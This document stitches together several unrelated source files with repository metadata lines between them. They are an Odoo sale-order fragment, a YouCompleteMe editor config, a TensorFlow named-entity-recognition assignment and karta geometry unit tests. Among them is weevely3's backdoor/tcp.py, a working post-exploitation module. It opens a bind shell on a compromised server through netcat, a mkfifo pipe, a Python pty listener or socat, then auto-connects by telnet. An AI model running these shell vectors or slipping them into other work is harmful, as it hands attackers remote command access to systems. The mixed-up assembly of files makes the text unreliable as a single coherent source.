vals.update({'name': sequence})
if (not context or not context.get('versioning', False)) and vals.get('sale_version_id', False):
del vals['sale_version_id']
vals['version'] = 0
return super(sale_order, self).create(cr, uid, vals, context)
class sale_shop(orm.Model):
_inherit = 'sale.shop'
_columns = {
        'sequence_id': fields.many2one('ir.sequence', 'Entry Sequence', help="This field contains the information related to the numbering of the Sale Orders.", domain="[('code', '=', 'sale.order')]"),
}
| agpl-3.0 | 3,669,966,839,879,994,000 | 41.274648 | 231 | 0.558387 | false |
doragasu/mw-wflash | src/.ycm_extra_conf.py | 1 | 6247 | # This file is NOT licensed under the GPLv3, which is the license for the rest
# of YouCompleteMe.
#
# Here's the license text for this file:
#
# This is free and unencumbered software released into the public domain.
#
# Anyone is free to copy, modify, publish, use, compile, sell, or
# distribute this software, either in source code form or as a compiled
# binary, for any purpose, commercial or non-commercial, and by any
# means.
#
# In jurisdictions that recognize copyright laws, the author or authors
# of this software dedicate any and all copyright interest in the
# software to the public domain. We make this dedication for the benefit
# of the public at large and to the detriment of our heirs and
# successors. We intend this dedication to be an overt act of
# relinquishment in perpetuity of all present and future rights to this
# software under copyright law.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
# ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
#
# For more information, please refer to <http://unlicense.org/>
import os
import ycm_core
# These are the compilation flags that will be used in case there's no
# compilation database set (by default, one is not set).
# CHANGE THIS LIST OF FLAGS. YES, THIS IS THE DROID YOU HAVE BEEN LOOKING FOR.
flags = [
'-Wall',
'-Wextra',
'-Wno-long-long',
'-Wno-variadic-macros',
'-fexceptions',
'-DNDEBUG',
# You 100% do NOT need -DUSE_CLANG_COMPLETER in your flags; only the YCM
# source code needs it.
'-DUSE_CLANG_COMPLETER',
# THIS IS IMPORTANT! Without a "-std=<something>" flag, clang won't know which
# language to use when compiling headers. So it will guess. Badly. So C++
# headers will be compiled as C headers. You don't want that so ALWAYS specify
# a "-std=<something>".
# For a C project, you would set this to something like 'c99' instead of
# 'c++11'.
'-std=gnu99',
# ...and the same thing goes for the magic -x option which specifies the
# language that the files to be compiled are written in. This is mostly
# relevant for c++ headers.
# For a C project, you would set this to 'c' instead of 'c++'.
'-x',
'c',
'-m68000',
'-isystem',
'../BoostParts',
'-isystem',
'../llvm/include',
'-isystem',
'../llvm/tools/clang/include',
'-I',
'.',
'-I',
'./ClangCompleter',
'-I',
'./Config',
'-isystem',
'./tests/gmock/gtest',
'-isystem',
'./tests/gmock/gtest/include',
'-isystem',
'./tests/gmock',
'-isystem',
'./tests/gmock/include',
# Include file for MD related stuff
]
# Set this to the absolute path to the folder (NOT the file!) containing the
# compile_commands.json file to use that instead of 'flags'. See here for
# more details: http://clang.llvm.org/docs/JSONCompilationDatabase.html
#
# You can get CMake to generate this file for you by adding:
# set( CMAKE_EXPORT_COMPILE_COMMANDS 1 )
# to your CMakeLists.txt file.
#
# Most projects will NOT need to set this to anything; you can just change the
# 'flags' list of compilation flags. Notice that YCM itself uses that approach.
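# For reference, an entry in compile_commands.json looks roughly like this
# (illustrative paths only):
#   [ { "directory": "/path/to/build",
#       "command": "gcc -I. -std=gnu99 -c /path/to/src/main.c",
#       "file": "/path/to/src/main.c" } ]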
compilation_database_folder = ''
if os.path.exists( compilation_database_folder ):
database = ycm_core.CompilationDatabase( compilation_database_folder )
else:
database = None
SOURCE_EXTENSIONS = [ '.cpp', '.cxx', '.cc', '.c', '.m', '.mm' ]
def DirectoryOfThisScript():
return os.path.dirname( os.path.abspath( __file__ ) )
def MakeRelativePathsInFlagsAbsolute( flags, working_directory ):
if not working_directory:
return list( flags )
new_flags = []
make_next_absolute = False
path_flags = [ '-isystem', '-I', '-iquote', '--sysroot=' ]
for flag in flags:
new_flag = flag
if make_next_absolute:
make_next_absolute = False
if not flag.startswith( '/' ):
new_flag = os.path.join( working_directory, flag )
for path_flag in path_flags:
if flag == path_flag:
make_next_absolute = True
break
if flag.startswith( path_flag ):
path = flag[ len( path_flag ): ]
new_flag = path_flag + os.path.join( working_directory, path )
break
if new_flag:
new_flags.append( new_flag )
return new_flags
def IsHeaderFile( filename ):
extension = os.path.splitext( filename )[ 1 ]
return extension in [ '.h', '.hxx', '.hpp', '.hh' ]
def GetCompilationInfoForFile( filename ):
# The compilation_commands.json file generated by CMake does not have entries
# for header files. So we do our best by asking the db for flags for a
# corresponding source file, if any. If one exists, the flags for that file
# should be good enough.
if IsHeaderFile( filename ):
basename = os.path.splitext( filename )[ 0 ]
for extension in SOURCE_EXTENSIONS:
replacement_file = basename + extension
if os.path.exists( replacement_file ):
compilation_info = database.GetCompilationInfoForFile(
replacement_file )
if compilation_info.compiler_flags_:
return compilation_info
return None
return database.GetCompilationInfoForFile( filename )
def FlagsForFile( filename, **kwargs ):
if database:
# Bear in mind that compilation_info.compiler_flags_ does NOT return a
# python list, but a "list-like" StringVec object
compilation_info = GetCompilationInfoForFile( filename )
if not compilation_info:
return None
final_flags = MakeRelativePathsInFlagsAbsolute(
compilation_info.compiler_flags_,
compilation_info.compiler_working_dir_ )
# NOTE: This is just for YouCompleteMe; it's highly likely that your project
# does NOT need to remove the stdlib flag. DO NOT USE THIS IN YOUR
# ycm_extra_conf IF YOU'RE NOT 100% SURE YOU NEED IT.
try:
final_flags.remove( '-stdlib=libc++' )
except ValueError:
pass
else:
relative_to = DirectoryOfThisScript()
final_flags = MakeRelativePathsInFlagsAbsolute( flags, relative_to )
return {
'flags': final_flags,
'do_cache': True
}
| gpl-3.0 | -4,638,745,777,331,748,000 | 32.586022 | 80 | 0.702097 | false |
epinna/weevely3 | modules/backdoor/tcp.py | 1 | 3727 | from core.vectors import PhpCode, ShellCmd, ModuleExec, Os
from core.module import Module
from core.loggers import log
from core import messages
import urllib.parse
import telnetlib
import time
class Tcp(Module):
"""Spawn a shell on a TCP port."""
def init(self):
self.register_info(
{
'author': [
'Emilio Pinna'
],
'license': 'GPLv3'
}
)
self.register_vectors(
[
ShellCmd(
"nc -l -p ${port} -e ${shell}",
name = 'netcat',
target = Os.NIX,
background = True
),
ShellCmd(
"rm -rf /tmp/f;mkfifo /tmp/f;cat /tmp/f|${shell} -i 2>&1|nc -l ${port} >/tmp/f; rm -rf /tmp/f",
name = 'netcat_bsd',
target = Os.NIX,
background = True
),
ShellCmd(
"""python -c 'import pty,os,socket;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind(("", ${port}));s.listen(1);(rem, addr) = s.accept();os.dup2(rem.fileno(),0);os.dup2(rem.fileno(),1);os.dup2(rem.fileno(),2);pty.spawn("${shell}");s.close()';""",
name = 'python_pty',
target = Os.NIX,
background = True
),
ShellCmd(
"""socat tcp-l:${port} exec:${shell}""",
name = 'socat',
target = Os.NIX,
background = True
)
]
)
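        # The netcat_bsd vector is the classic FIFO workaround for nc builds
        # that lack -e: the named pipe feeds the shell's stdin from the nc
        # listener while the shell's output is piped back into the same nc.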
self.register_arguments([
{ 'name' : 'port', 'help' : 'Port to spawn', 'type' : int },
{ 'name' : '-shell', 'help' : 'Specify shell', 'default' : '/bin/sh' },
{ 'name' : '-no-autoconnect', 'help' : 'Skip autoconnect', 'action' : 'store_true', 'default' : False },
{ 'name' : '-vector', 'choices' : self.vectors.get_names() }
])
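    # Typical invocation from the weevely console (illustrative; the command
    # name backdoor_tcp is assumed from the module path):
    #   :backdoor_tcp 2222 -shell /bin/bash -vector netcat
    # Each selected vector is launched in the background on the target;
    # unless -no-autoconnect is given, run() then telnets to the new port.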
def run(self):
# Run all the vectors
for vector in self.vectors:
# Skip vector if -vector is specified but does not match
if self.args.get('vector') and self.args.get('vector') != vector.name:
continue
# Background run does not return results
vector.run(self.args)
# If set, skip autoconnect
if self.args.get('no_autoconnect'): continue
# Give some time to spawn the shell
time.sleep(1)
urlparsed = urllib.parse.urlparse(self.session['url'])
if not urlparsed.hostname:
log.debug(
messages.module_backdoor_tcp.error_parsing_connect_s % self.args['port']
)
continue
try:
telnetlib.Telnet(urlparsed.hostname, self.args['port'], timeout = 5).interact()
                # If telnetlib does not raise an exception, we can assume the
                # session ended correctly and return from `run()`
return
except Exception as e:
log.debug(
messages.module_backdoor_tcp.error_connecting_to_s_s_s % (
urlparsed.hostname,
self.args['port'],
e
)
)
        # If autoconnect was expected but no Telnet() call ever succeeded,
        # print an error message
if not self.args.get('no_autoconnect'):
log.warn(
messages.module_backdoor_tcp.error_connecting_to_s_s_s % (
urlparsed.hostname,
self.args['port'],
'remote port not open or unreachable'
)
)
| gpl-3.0 | -6,986,358,487,308,145,000 | 32.881818 | 270 | 0.473303 | false |
ds-hwang/deeplearning_udacity | cs224d_nlp/assignment2_dev/q2_NER.py | 1 | 15598 | import os
import getpass
import sys
import time
import numpy as np
import tensorflow as tf
from q2_initialization import xavier_weight_init
import data_utils.utils as du
import data_utils.ner as ner
from utils import data_iterator
from model import LanguageModel
class Config(object):
"""Holds model hyperparams and data information.
The config class is used to store various hyperparameters and dataset
information parameters. Model objects are passed a Config() object at
instantiation.
"""
embed_size = 50
batch_size = 64
label_size = 5
hidden_size = 100
max_epochs = 24
early_stopping = 2
dropout = 0.9
lr = 0.001
l2 = 0.001
window_size = 3
class NERModel(LanguageModel):
"""Implements a NER (Named Entity Recognition) model.
This class implements a deep network for named entity recognition. It
inherits from LanguageModel, which has an add_embedding method in addition to
the standard Model method.
"""
def load_data(self, debug=False):
"""Loads starter word-vectors and train/dev/test data."""
# Load the starter word vectors
self.wv, word_to_num, num_to_word = ner.load_wv(
'data/ner/vocab.txt', 'data/ner/wordVectors.txt')
tagnames = ['O', 'LOC', 'MISC', 'ORG', 'PER']
self.num_to_tag = dict(enumerate(tagnames))
tag_to_num = {v:k for k,v in self.num_to_tag.iteritems()}
# Load the training set
docs = du.load_dataset('data/ner/train')
self.X_train, self.y_train = du.docs_to_windows(
docs, word_to_num, tag_to_num, wsize=self.config.window_size)
if debug:
self.X_train = self.X_train[:1024]
self.y_train = self.y_train[:1024]
# Load the dev set (for tuning hyperparameters)
docs = du.load_dataset('data/ner/dev')
self.X_dev, self.y_dev = du.docs_to_windows(
docs, word_to_num, tag_to_num, wsize=self.config.window_size)
if debug:
self.X_dev = self.X_dev[:1024]
self.y_dev = self.y_dev[:1024]
# Load the test set (dummy labels only)
docs = du.load_dataset('data/ner/test.masked')
self.X_test, self.y_test = du.docs_to_windows(
docs, word_to_num, tag_to_num, wsize=self.config.window_size)
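  # Illustrative (assumption about data_utils): with window_size=3,
  # docs_to_windows turns each tagged token into a row of
  # [left, center, right] vocabulary indices, padded at sentence
  # boundaries, so each X_* has shape (n_windows, 3) and each y_* holds
  # the tag index of the center word.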
def add_placeholders(self):
"""Generate placeholder variables to represent the input tensors
These placeholders are used as inputs by the rest of the model building
code and will be fed data during training. Note that when "None" is in a
placeholder's shape, it's flexible
Adds following nodes to the computational graph
input_placeholder: Input placeholder tensor of shape
(None, window_size), type tf.int32
labels_placeholder: Labels placeholder tensor of shape
(None, label_size), type tf.float32
dropout_placeholder: Dropout value placeholder (scalar),
type tf.float32
Add these placeholders to self as the instance variables
self.input_placeholder
self.labels_placeholder
self.dropout_placeholder
(Don't change the variable names)
"""
### YOUR CODE HERE
self.input_placeholder = tf.placeholder(
tf.int32, shape=[None, self.config.window_size], name='Input')
self.labels_placeholder = tf.placeholder(
tf.float32, shape=[None, self.config.label_size], name='Target')
self.dropout_placeholder = tf.placeholder(tf.float32, name='Dropout')
### END YOUR CODE
def create_feed_dict(self, input_batch, dropout, label_batch=None):
"""Creates the feed_dict for softmax classifier.
A feed_dict takes the form of:
feed_dict = {
<placeholder>: <tensor of values to be passed for placeholder>,
....
}
Hint: The keys for the feed_dict should be a subset of the placeholder
tensors created in add_placeholders.
Hint: When label_batch is None, don't add a labels entry to the feed_dict.
Args:
input_batch: A batch of input data.
label_batch: A batch of label data.
Returns:
feed_dict: The feed dictionary mapping from placeholders to values.
"""
### YOUR CODE HERE
feed_dict = {
self.input_placeholder: input_batch,
}
if label_batch is not None:
feed_dict[self.labels_placeholder] = label_batch
if dropout is not None:
feed_dict[self.dropout_placeholder] = dropout
### END YOUR CODE
return feed_dict
def add_embedding(self):
"""Add embedding layer that maps from vocabulary to vectors.
Creates an embedding tensor (of shape (len(self.wv), embed_size). Use the
input_placeholder to retrieve the embeddings for words in the current batch.
(Words are discrete entities. They need to be transformed into vectors for use
in deep-learning. Although we won't do so in this problem, in practice it's
useful to initialize the embedding with pre-trained word-vectors. For this
problem, using the default initializer is sufficient.)
Hint: This layer should use the input_placeholder to index into the
embedding.
Hint: You might find tf.nn.embedding_lookup useful.
Hint: See following link to understand what -1 in a shape means.
https://www.tensorflow.org/versions/r0.8/api_docs/python/array_ops.html#reshape
Hint: Check the last slide from the TensorFlow lecture.
Hint: Here are the dimensions of the variables you will need to create:
L: (len(self.wv), embed_size)
Returns:
window: tf.Tensor of shape (-1, window_size*embed_size)
"""
# The embedding lookup is currently only implemented for the CPU
with tf.device('/cpu:0'):
### YOUR CODE HERE
embedding = tf.get_variable('Embedding', [len(self.wv), self.config.embed_size])
window = tf.nn.embedding_lookup(embedding, self.input_placeholder)
window = tf.reshape(
window, [-1, self.config.window_size * self.config.embed_size])
### END YOUR CODE
return window
def add_model(self, window):
"""Adds the 1-hidden-layer NN.
Hint: Use a variable_scope (e.g. "Layer") for the first hidden layer, and
another variable_scope (e.g. "Softmax") for the linear transformation
preceding the softmax. Make sure to use the xavier_weight_init you
defined in the previous part to initialize weights.
Hint: Make sure to add in regularization and dropout to this network.
Regularization should be an addition to the cost function, while
dropout should be added after both variable scopes.
Hint: You might consider using a tensorflow Graph Collection (e.g
"total_loss") to collect the regularization and loss terms (which you
will add in add_loss_op below).
Hint: Here are the dimensions of the various variables you will need to
create
W: (window_size*embed_size, hidden_size)
b1: (hidden_size,)
U: (hidden_size, label_size)
b2: (label_size)
https://www.tensorflow.org/versions/r0.7/api_docs/python/framework.html#graph-collections
Args:
window: tf.Tensor of shape (-1, window_size*embed_size)
Returns:
output: tf.Tensor of shape (batch_size, label_size)
"""
### YOUR CODE HERE
with tf.variable_scope('Layer1', initializer=xavier_weight_init()) as scope:
W = tf.get_variable(
'W', [self.config.window_size * self.config.embed_size,
self.config.hidden_size])
b1 = tf.get_variable('b1', [self.config.hidden_size])
h = tf.nn.tanh(tf.matmul(window, W) + b1)
if self.config.l2:
tf.add_to_collection('total_loss', 0.5 * self.config.l2 * tf.nn.l2_loss(W))
with tf.variable_scope('Layer2', initializer=xavier_weight_init()) as scope:
U = tf.get_variable('U', [self.config.hidden_size, self.config.label_size])
b2 = tf.get_variable('b2', [self.config.label_size])
y = tf.matmul(h, U) + b2
if self.config.l2:
tf.add_to_collection('total_loss', 0.5 * self.config.l2 * tf.nn.l2_loss(U))
output = tf.nn.dropout(y, self.dropout_placeholder)
### END YOUR CODE
return output
def add_loss_op(self, y):
"""Adds cross_entropy_loss ops to the computational graph.
Hint: You can use tf.nn.softmax_cross_entropy_with_logits to simplify your
implementation. You might find tf.reduce_mean useful.
Args:
pred: A tensor of shape (batch_size, n_classes)
Returns:
loss: A 0-d tensor (scalar)
"""
### YOUR CODE HERE
cross_entropy = tf.reduce_mean(
tf.nn.softmax_cross_entropy_with_logits(y, self.labels_placeholder))
tf.add_to_collection('total_loss', cross_entropy)
loss = tf.add_n(tf.get_collection('total_loss'))
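    # Note: the 'total_loss' collection already holds the L2 penalties
    # stashed by add_model, so this sum is
    # cross-entropy + 0.5*l2*(||W||^2 + ||U||^2).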
### END YOUR CODE
return loss
def add_training_op(self, loss):
"""Sets up the training Ops.
Creates an optimizer and applies the gradients to all trainable variables.
The Op returned by this function is what must be passed to the
`sess.run()` call to cause the model to train. See
https://www.tensorflow.org/versions/r0.7/api_docs/python/train.html#Optimizer
for more information.
Hint: Use tf.train.AdamOptimizer for this model.
Calling optimizer.minimize() will return a train_op object.
Args:
loss: Loss tensor, from cross_entropy_loss.
Returns:
train_op: The Op for training.
"""
### YOUR CODE HERE
optimizer = tf.train.AdamOptimizer(self.config.lr)
global_step = tf.Variable(0, name='global_step', trainable=False)
train_op = optimizer.minimize(loss, global_step=global_step)
### END YOUR CODE
return train_op
def __init__(self, config):
"""Constructs the network using the helper functions defined above."""
self.config = config
self.load_data(debug=False)
self.add_placeholders()
window = self.add_embedding()
y = self.add_model(window)
self.loss = self.add_loss_op(y)
self.predictions = tf.nn.softmax(y)
one_hot_prediction = tf.argmax(self.predictions, 1)
correct_prediction = tf.equal(
tf.argmax(self.labels_placeholder, 1), one_hot_prediction)
self.correct_predictions = tf.reduce_sum(tf.cast(correct_prediction, 'int32'))
self.train_op = self.add_training_op(self.loss)
def run_epoch(self, session, input_data, input_labels,
shuffle=True, verbose=True):
orig_X, orig_y = input_data, input_labels
dp = self.config.dropout
# We're interested in keeping track of the loss and accuracy during training
total_loss = []
total_correct_examples = 0
total_processed_examples = 0
total_steps = len(orig_X) / self.config.batch_size
for step, (x, y) in enumerate(
data_iterator(orig_X, orig_y, batch_size=self.config.batch_size,
label_size=self.config.label_size, shuffle=shuffle)):
feed = self.create_feed_dict(input_batch=x, dropout=dp, label_batch=y)
loss, total_correct, _ = session.run(
[self.loss, self.correct_predictions, self.train_op],
feed_dict=feed)
total_processed_examples += len(x)
total_correct_examples += total_correct
total_loss.append(loss)
##
if verbose and step % verbose == 0:
sys.stdout.write('\r{} / {} : loss = {}'.format(
step, total_steps, np.mean(total_loss)))
sys.stdout.flush()
if verbose:
sys.stdout.write('\r')
sys.stdout.flush()
return np.mean(total_loss), total_correct_examples / float(total_processed_examples)
def predict(self, session, X, y=None):
"""Make predictions from the provided model."""
# If y is given, the loss is also calculated
# We deactivate dropout by setting it to 1
dp = 1
losses = []
results = []
if np.any(y):
data = data_iterator(X, y, batch_size=self.config.batch_size,
label_size=self.config.label_size, shuffle=False)
else:
data = data_iterator(X, batch_size=self.config.batch_size,
label_size=self.config.label_size, shuffle=False)
for step, (x, y) in enumerate(data):
feed = self.create_feed_dict(input_batch=x, dropout=dp)
if np.any(y):
feed[self.labels_placeholder] = y
loss, preds = session.run(
[self.loss, self.predictions], feed_dict=feed)
losses.append(loss)
else:
preds = session.run(self.predictions, feed_dict=feed)
predicted_indices = preds.argmax(axis=1)
results.extend(predicted_indices)
return np.mean(losses), results
def print_confusion(confusion, num_to_tag):
"""Helper method that prints confusion matrix."""
# Summing top to bottom gets the total number of tags guessed as T
total_guessed_tags = confusion.sum(axis=0)
# Summing left to right gets the total number of true tags
total_true_tags = confusion.sum(axis=1)
print
print confusion
for i, tag in sorted(num_to_tag.items()):
prec = confusion[i, i] / float(total_guessed_tags[i])
recall = confusion[i, i] / float(total_true_tags[i])
print 'Tag: {} - P {:2.4f} / R {:2.4f}'.format(tag, prec, recall)
def calculate_confusion(config, predicted_indices, y_indices):
"""Helper method that calculates confusion matrix."""
confusion = np.zeros((config.label_size, config.label_size), dtype=np.int32)
for i in xrange(len(y_indices)):
correct_label = y_indices[i]
guessed_label = predicted_indices[i]
confusion[correct_label, guessed_label] += 1
return confusion
def save_predictions(predictions, filename):
"""Saves predictions to provided file."""
with open(filename, "wb") as f:
for prediction in predictions:
f.write(str(prediction) + "\n")
def test_NER():
"""Test NER model implementation.
You can use this function to test your implementation of the Named Entity
Recognition network. When debugging, set max_epochs in the Config object to 1
so you can rapidly iterate.
"""
config = Config()
with tf.Graph().as_default():
model = NERModel(config)
init = tf.initialize_all_variables()
saver = tf.train.Saver()
with tf.Session() as session:
best_val_loss = float('inf')
best_val_epoch = 0
session.run(init)
for epoch in xrange(config.max_epochs):
print 'Epoch {}'.format(epoch)
start = time.time()
###
train_loss, train_acc = model.run_epoch(session, model.X_train,
model.y_train)
val_loss, predictions = model.predict(session, model.X_dev, model.y_dev)
print 'Training loss: {}'.format(train_loss)
print 'Training acc: {}'.format(train_acc)
print 'Validation loss: {}'.format(val_loss)
if val_loss < best_val_loss:
best_val_loss = val_loss
best_val_epoch = epoch
if not os.path.exists("./weights"):
os.makedirs("./weights")
saver.save(session, './weights/ner.weights')
if epoch - best_val_epoch > config.early_stopping:
break
###
confusion = calculate_confusion(config, predictions, model.y_dev)
print_confusion(confusion, model.num_to_tag)
print 'Total time: {}'.format(time.time() - start)
saver.restore(session, './weights/ner.weights')
print 'Test'
print '=-=-='
print 'Writing predictions to q2_test.predicted'
_, predictions = model.predict(session, model.X_test, model.y_test)
save_predictions(predictions, "q2_test.predicted")
if __name__ == "__main__":
test_NER()
| mit | -2,195,417,113,203,144,000 | 37.136919 | 93 | 0.652904 | false |
fortyninemaps/karta | tests/vector_predicate_tests.py | 1 | 11300 | """ Unit tests for vector geometry predicate methods """
from __future__ import division
import unittest
import numpy as np
from karta.vector.geometry import (Point, Line, Polygon,
Multipoint, Multiline, Multipolygon)
from karta.crs import (Cartesian, SphericalEarth, LonLatWGS84)
from karta.errors import CRSError
class TestUnaryPredicates(unittest.TestCase):
def test_poly_clockwise(self):
p = Polygon([(0,0), (0,1), (1,1), (1,0)])
self.assertTrue(p.isclockwise())
return
def test_poly_counterclockwise(self):
p = Polygon([(0,0), (1,0), (1,1), (0,1)])
self.assertFalse(p.isclockwise())
return
def test_poly_polar(self):
p = Polygon([(0.0, 80.0), (30.0, 80.0), (60.0, 80.0), (90.0, 80.0),
(120.0, 80.0), (150.0, 80.0), (180.0, 80.0),
(-150.0, 80.0), (-120.0, 80.0), (-90.0, 80.0),
(-60.0, 80.0), (-30.0, 80.0)], crs=SphericalEarth)
self.assertTrue(p.ispolar())
p = Polygon([(0.0, 85.0, 0.0), (90.0, 85.0, 0.0), (180.0, 85.0, 0.0),
(-90.0, 85.0, 0.0)], crs=SphericalEarth)
self.assertTrue(p.ispolar())
p = Polygon([(45.0, 30.0), (40.0, 25.0), (45.0, 20.0), (35.0, 25.0)],
crs=SphericalEarth)
self.assertFalse(p.ispolar())
p = Polygon([(-80, 0), (-50, -10), (20, -8), (35, -17), (55, 15),
(-45, 18), (-60, 12)], crs=LonLatWGS84)
self.assertFalse(p.ispolar())
p = Polygon([(45.0, 30.0), (40.0, 25.0), (45.0, 20.0), (35.0, 25.0)],
crs=Cartesian)
self.assertRaises(CRSError, p.ispolar)
return
class TestBinaryPredicates(unittest.TestCase):
def test_line_intersection(self):
line0 = Line([(0.0, 0.0), (3.0, 3.0)])
line1 = Line([(0.0, 3.0), (3.0, 0.0)])
self.assertTrue(line0.intersects(line1))
self.assertEqual(line0.intersections(line1), Multipoint([(1.5, 1.5)]))
return
def test_line_intersection2(self):
# test lines that have overlapping bounding boxes, but don't cross
# -----
# | -----
# | |
# ----- |
# -----
line0 = Line([(0.0, 0.0), (3.0, 0.0), (3.0, 3.0), (0.0, 3.0)])
line1 = Line([(1.0, 4.0), (-2.0, 4.0), (-2.0, 1.0), (1.0, 1.0)])
self.assertFalse(line0.intersects(line1))
return
def test_poly_intersection(self):
# test polygons formed exactly as in test_line_intersection2, except
# the rings are implicitly closed
# -----
# | --x--
# | . . |
# --x-- |
# -----
poly0 = Polygon([(0.0, 0.0), (3.0, 0.0), (3.0, 3.0), (0.0, 3.0)])
poly1 = Polygon([(1.0, 4.0), (-2.0, 4.0), (-2.0, 1.0), (1.0, 1.0)])
self.assertTrue(poly0.intersects(poly1))
self.assertEqual(poly0.intersections(poly1), Multipoint([(0.0, 1.0), (1.0, 3.0)]))
return
def test_line_intersection_horizontal(self):
line0 = Line([(-2.5, 2.5), (2.5, 2.5)])
line1 = Line([(0.0, 0.0), (1.0, 5.0)])
self.assertTrue(line0.intersects(line1))
self.assertEqual(line0.intersections(line1), Multipoint([(0.5, 2.5)]))
return
def test_line_intersection_vertical(self):
line0 = Line([(2.5, 2.5), (2.5, -2.5)])
line1 = Line([(1.5, 2.5), (3.5, -2.5)])
self.assertTrue(line0.intersects(line1))
self.assertEqual(line0.intersections(line1), Multipoint([(2.5, 0.0)]))
return
def test_intersection_polygons(self):
poly0 = Polygon([(0, 0), (2, 0), (3, 1), (2, 1), (2, 2), (1, 0)])
poly1 = Polygon([(-1, -1), (1, -1), (1, 1), (-1, 1)])
self.assertTrue(poly0.intersects(poly1))
return
def test_line_intersects_geographical1(self):
line1 = Line([(-40.0, 36.0), (-38.0, 36.5)], crs=SphericalEarth)
line2 = Line([(-39.0, 34.0), (-39.0, 37.5)], crs=SphericalEarth)
self.assertTrue(line1.intersects(line2))
return
def test_line_intersects_geographical2(self):
line1 = Line([(-40.0, 36.0), (-38.0, 36.5)], crs=SphericalEarth)
line2 = Line([(-42.0, 34.0), (-41.0, 37.5)], crs=SphericalEarth)
self.assertFalse(line1.intersects(line2))
return
def test_line_intersects_geographical3(self):
# checks to make sure geodesics are handled
line1 = Line([(-50.0, 70.0), (50.0, 70.0)], crs=SphericalEarth)
line2 = Line([(0.0, 71.0), (1.0, 89.0)], crs=SphericalEarth)
self.assertTrue(line1.intersects(line2))
return
def test_line_intersects_geographical4(self):
# catches possible bugs in handling vertical segments on sweepline
line1 = Line([(-50.0, 70.0), (50.0, 70.0)], crs=SphericalEarth)
line2 = Line([(0.0, 71.0), (0.0, 89.0)], crs=SphericalEarth)
self.assertTrue(line1.intersects(line2))
return
    def test_line_intersects_geographical5(self):
# checks that coordinates are normalized
line1 = Line([(-10.0, 20.0), (-30.0, 20.0)], crs=SphericalEarth)
line2 = Line([(340.0, 10.0), (340.0, 30.0)], crs=SphericalEarth)
self.assertTrue(line1.intersects(line2))
return
def test_poly_contains1(self):
# trivial cases
pt0 = Point((-0.5, 0.92))
unitsquare = Polygon([(0.0,0.0), (1.0,0.0), (1.0,1.0), (0.0,1.0)])
self.assertFalse(unitsquare.contains(pt0))
pt1 = Point((0.125, 0.875))
self.assertTrue(unitsquare.contains(pt1))
x = np.arange(-4, 5)
y = (x)**2
line = Line([(x_,y_) for x_,y_ in zip(x, y)], crs=Cartesian)
bbox = Polygon([(-2.5, 2.5), (2.5, 2.5), (2.5, -2.5), (-2.5, -2.5)],
crs=Cartesian)
self.assertEqual(list(filter(bbox.contains, line)),
[Point((-1, 1)), Point((0, 0)), Point((1, 1))])
return
def test_poly_contains2(self):
# test some hard cases
diamond = Polygon([(0,0), (1,1), (2,0), (1, -1)])
self.assertFalse(diamond.contains(Point((2, 1))))
self.assertTrue(diamond.contains(Point((1, 0))))
self.assertFalse(diamond.contains(Point((2.5, 0))))
self.assertFalse(diamond.contains(Point((0, -1))))
self.assertFalse(diamond.contains(Point((2, -1))))
return
def test_poly_contains3(self):
# case where point is on an edge (should return true)
square = Polygon([(0,0), (1,0), (1,1), (0,1)])
self.assertTrue(square.contains(Point([0.5, 0])))
self.assertTrue(square.contains(Point([0, 0.5])))
return
def test_poly_contains4(self):
# hippie star
theta = np.linspace(0, 2*np.pi, 361)[:-1]
r = 10*np.sin(theta*8) + 15
x = np.cos(theta) * r + 25
y = np.sin(theta) * r + 25
polygon = Polygon(zip(x, y))
# causes naive cross-product methods to fail
pt = Point((28.75, 25.625))
self.assertTrue(polygon.contains(pt))
return
def test_poly_contains_polar(self):
p = Polygon([(0, 80), (45, 80), (90, 80), (135, 80), (180, 80),
(225, 80), (270, 80), (315, 80)],
crs=SphericalEarth)
self.assertTrue(p.contains(Point((45, 85), crs=SphericalEarth)))
self.assertFalse(p.contains(Point((45, 75), crs=SphericalEarth)))
return
def test_within_distance(self):
line = Line([(0,0), (1,1), (3,1)])
pt = Point((1,1.5))
self.assertTrue(line.within_distance(pt, 0.6))
self.assertFalse(line.within_distance(pt, 0.4))
return
def test_multipoint_within_bbox(self):
vertices = [(float(x),float(y)) for x in range(-10,11)
for y in range(-10,11)]
ans = [v for v in vertices if (-5.0<v[0]<5.0) and (-4.0<v[1]<6.0)]
mp = Multipoint(vertices)
sub = mp.within_bbox((-5.0, -4.0, 5.0, 6.0))
self.assertEqual(sub, Multipoint(ans))
return
def test_multipoint_within_polygon(self):
np.random.seed(42)
x = (np.random.random(100) - 0.5) * 180.0
y = (np.random.random(100) - 0.5) * 30.0
xp = [-80, -50, 20, 35, 55, -45, -60]
yp = [0, -10, -8, -17, 15, 18, 12]
poly = Polygon(zip(xp, yp), crs=LonLatWGS84)
mp = Multipoint(zip(x, y), crs=LonLatWGS84)
subset = mp.within_polygon(poly)
excluded = [pt for pt in mp if pt not in subset]
self.assertTrue(all(poly.contains(pt) for pt in subset))
self.assertFalse(any(poly.contains(pt) for pt in excluded))
return
def test_multiline_touching_line(self):
np.random.seed(49)
multiline = Multiline([10*np.random.rand(10, 2)
+ np.random.randint(-50, 50, (1, 2)) for _ in range(50)])
line = Line([(-30, -40), (11, -30), (10, 22), (-10, 50)])
touching = multiline.touching(line)
self.assertEqual(len(touching), 4)
return
def test_multipolygon_touching_line(self):
np.random.seed(49)
multipolygon = \
Multipolygon([[np.array([[0,0],[10,0],[10,10],[0,10]])
+ np.random.randint(-50, 50, (1, 2))]
for _ in range(50)])
line = Line([(-40, -35), (-15, -30), (30, 5), (10, 32), (-15, 17)])
touching = multipolygon.touching(line)
self.assertEqual(len(touching), 10)
return
def test_multiline_touching_poly(self):
np.random.seed(49)
multiline = Multiline([10*np.random.rand(10, 2)
+ np.random.randint(-50, 50, (1, 2)) for _ in range(50)])
poly = Polygon([(-30, -40), (12, -30), (8, 22), (-10, 50)])
touching = multiline.touching(poly)
self.assertEqual(len(touching), 12)
return
